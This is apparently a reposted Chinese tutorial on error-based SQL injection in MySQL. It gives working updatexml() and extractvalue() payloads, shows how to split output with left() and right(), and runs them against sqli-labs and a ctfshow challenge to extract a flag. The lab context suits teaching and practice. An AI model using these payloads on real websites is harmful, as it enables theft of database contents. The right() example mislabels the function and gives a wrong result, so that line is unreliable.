SQL注入--报错注入--理论
什么是报错注入?
正常用户向数据库查询数据,查询语句出现错误时会返回报错信息。
如果数据库对查询语句的输入和数据的输出没有进行合理检测,攻击者就可以通过构造语句让报错信息中包含数据库的内容。
基本利用形式
updatexml注入
函数形式如下:
updatexml (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称
第二个参数:XPath_string ,是Xpath格式的字符串)
第三个参数:new_value,String格式,替换查找到的符合条件的数据
常用的注入语句如下:
?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1);
原理:由于updatexml的第二个参数需要 Xpath格式的字符串,以~开头的内容不是xml格式的语法,concat()函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。
以sqli-labs第五关为例:
0x7e的作用就是在字符串的前后增加~号。
?id=1' and updatexml(1,concat(0x7e,
(select database()) //替换这部分的命令,进行查询
,0x7e),1);
?id=1' and updatexml(1,concat(0x7e,(select group_concat(flag33) from ctfshow.flagpuck),0x7e),1)--+
我们查到了flag数据,但是发现界面回显的flag并不完整。
这是因为报错注入的输出是有长度限制的。返回的字符长度差不多是三十五个。
怎么绕过字符串返回长度限制?
--left()
left(<字符串>,<从最左边开始截取的字符串长度>)
如 left('name',2) //返回结果为na
--right()
right(<字符串>,<从最右边开始截取的字符串长度>)
如 left('name',2) //返回结果为ma
--substring()
substring('firstname',5,3) 截取 firstname 这个字段 从第五个字符开始 只截取之后的3个字符
返回值为:tna
?id=1' and updatexml(1,concat(0x7e,left((select group_concat(flag33) from ctfshow.flagpuck),25),0x7e),1)--+
// XPATH syntax error: '~ctfshow{b4ee4409-1ca2-46'
?id=1' and updatexml(1,concat(0x7e, right((select(group_concat(flag33)) from ctfshow.flagpuck),25),0x7e),3)--+
// XPATH syntax error: '~2-465c-bfa5-ab69c5b15e37}~'
得到flag:ctfshow{b4ee4409-1ca2-465c-bfa5-ab69c5b15e37}
extractvalue注入
函数形式如下:
extractvalue(XML_document, XPath_string);
和updatexml很像。updatexml是修改,而extractvalue是查询。
用法是一样的:
extractvalue(1,concat(0x7e,(select group_concat(flag33) from ctfshow.flagpuck),0x7e))
原文地址:https://blog.csdn.net/m0_56019217/article/details/143983587
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!